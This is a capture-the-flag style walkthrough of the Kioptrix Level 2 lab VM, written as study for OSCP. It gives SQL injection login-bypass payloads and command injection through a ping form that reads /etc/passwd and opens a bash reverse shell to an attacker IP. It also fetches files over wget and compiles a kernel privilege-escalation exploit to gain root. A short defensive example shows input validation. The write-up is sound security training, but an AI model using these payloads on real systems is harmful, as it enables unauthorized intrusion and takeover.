Kioptrix: Level 2 Walkthrough
This is the second post of a series of posts I’m creating to study for OSCP. You can find the previous post by clicking here.
URL: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
Release date: 11 Feb 2011
Author: Kioptrix
Provided description: This Kioptrix VM image is an easy challenge. The objective of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.
# Scanning and Enumeration
As always, let’s start with some basic scanning and enumeration:
With Nmap, we scan only the top 1000 ports and detect their service versions:

```bash
nmap -T4 -sV <ipaddress>
```
It seems we have a web server here, let’s see what its page looks like:
# Exploiting
It is a simple login form, which raises a flag: could it be vulnerable to SQL injection? Let's try some classic payloads:

```
' or 1=1 -- -
admin' -- -
```
And… it works!
You can also automate trying these payloads with Burp Suite: send the request to the "Intruder" tab, mark the parameter as the payload position, and set the attack type to "Sniper". You can find many payloads to try here.
As you can see in the image above, the length column in Intruder's results is a good guide: in this case the results with length 860 belonged to payloads that didn't work, while those with length 779 worked! You read that right: at least 6 payloads worked here!
Now that we have access to the tool, we need to find out what it does. Its purpose seems to be to ping a host:
If the form runs a shell command behind the scenes, what happens if we append more commands to it? We can ping the server and then cat a file:

```
127.0.0.1;cat ../../../etc/passwd
```

This input first pings the server itself, terminates that command with a semicolon (;), and then cats the /etc/passwd file. The three ../ in the path climb three directory levels up from the web server's working directory to the / directory:
It worked. Why not get a reverse shell, then?
On the attacker machine:

```bash
nc -lvp 1337
```

In the browser:

```
127.0.0.1; bash -i >& /dev/tcp/192.168.15.6/1337 0>&1
```

The command above delivers a reverse shell to port 1337 on our attacker machine, which is already listening:
We are in! All we have to do now is to escalate our privileges.
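A defensive counterpart to the ping form abused above, as an added example that is not part of the original post or the Kioptrix VM: it assumes a hypothetical Python back end (the post does not say what the box's form is written in) and shows the two controls that would have stopped both the `;cat` and the reverse-shell payloads, namely an allow-list check on the host value and invoking ping through an argument vector with no shell.

```python
import ipaddress
import re
import subprocess

# Constructed example, not the VM's own code. The vulnerable form evidently
# concatenates the user's value into a shell command line, so ";" starts a
# second command. The fix is to (1) accept only something that looks like a
# host and (2) never hand the value to a shell at all.

# RFC 1123 style hostname: dot-separated labels of letters, digits and
# hyphens. A leading hyphen is refused on purpose: even with no shell, a
# value such as "-c 1000 ..." would otherwise be parsed as ping options.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def is_valid_ping_target(value: str) -> bool:
    """Allow-list check: an IPv4/IPv6 literal or a plain hostname, nothing else."""
    value = value.strip()
    if not value:
        return False
    try:
        ipaddress.ip_address(value)  # accepts "127.0.0.1", "::1", ...
        return True
    except ValueError:
        pass  # not an IP literal; fall through to the hostname rule
    return bool(_HOSTNAME_RE.match(value))


def build_ping_argv(target: str) -> list:
    """Argument vector for ping. Raises ValueError on anything not allow-listed."""
    if not is_valid_ping_target(target):
        raise ValueError("invalid ping target")
    return ["ping", "-c", "3", target.strip()]


def run_ping(target: str) -> str:
    """Run ping without a shell: ';', '>&' and '/dev/tcp' are just characters here."""
    proc = subprocess.run(build_ping_argv(target), capture_output=True,
                          text=True, timeout=15)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    # Constructed inputs: a legitimate host and the two payloads from the walkthrough.
    for sample in ("127.0.0.1", "127.0.0.1;cat ../../../etc/passwd",
                   "127.0.0.1; bash -i >& /dev/tcp/192.168.15.6/1337 0>&1"):
        print(repr(sample), "->", "accepted" if is_valid_ping_target(sample) else "rejected")
```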
# Escalating Privileges
To enumerate the machine and search for an exploit, I’m going to use LinEnum.sh on this one.
To transfer the file to the machine, you can serve it with Python's built-in HTTP server and retrieve it with wget:
Attacker machine:

```bash
python3 -m http.server 8000
```

To download the file on the victim machine (wget takes the output path via -O, not as a second positional argument):

```bash
wget http://<attackerIP>:8000/LinEnum.sh -O /tmp/linenum.sh
```

Then navigate to the /tmp folder and make the file executable:

```bash
cd /tmp; chmod +x linenum.sh
```
With all set, we can finally run it and search for exploits:
Early in the script's output we found something curious: this is a really old Linux kernel version. Looking it up on Exploit-DB, we find the following exploit:
This exploit is for CVE-2009-2698, which has the following description:
The udp_sendmsg function in the UDP implementation in (1) net/ipv4/udp.c and (2) net/ipv6/udp.c in the Linux kernel before 2.6.19 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via vectors involving the MSG_MORE flag and a UDP socket.
This is a kernel exploit, so we have to compile it on the victim’s machine and then run it to get the root shell:
```bash
# Download the file by pulling it from your attacker machine:
cd /tmp; wget http://<attackerIP>:8000/9542.c
# Compile the C file with GCC and then run it:
gcc -o 9542 9542.c && ./9542
```
And with that, we get the shell:
And that’s it, we rooted this box. If you have any questions, let me know in the comments section.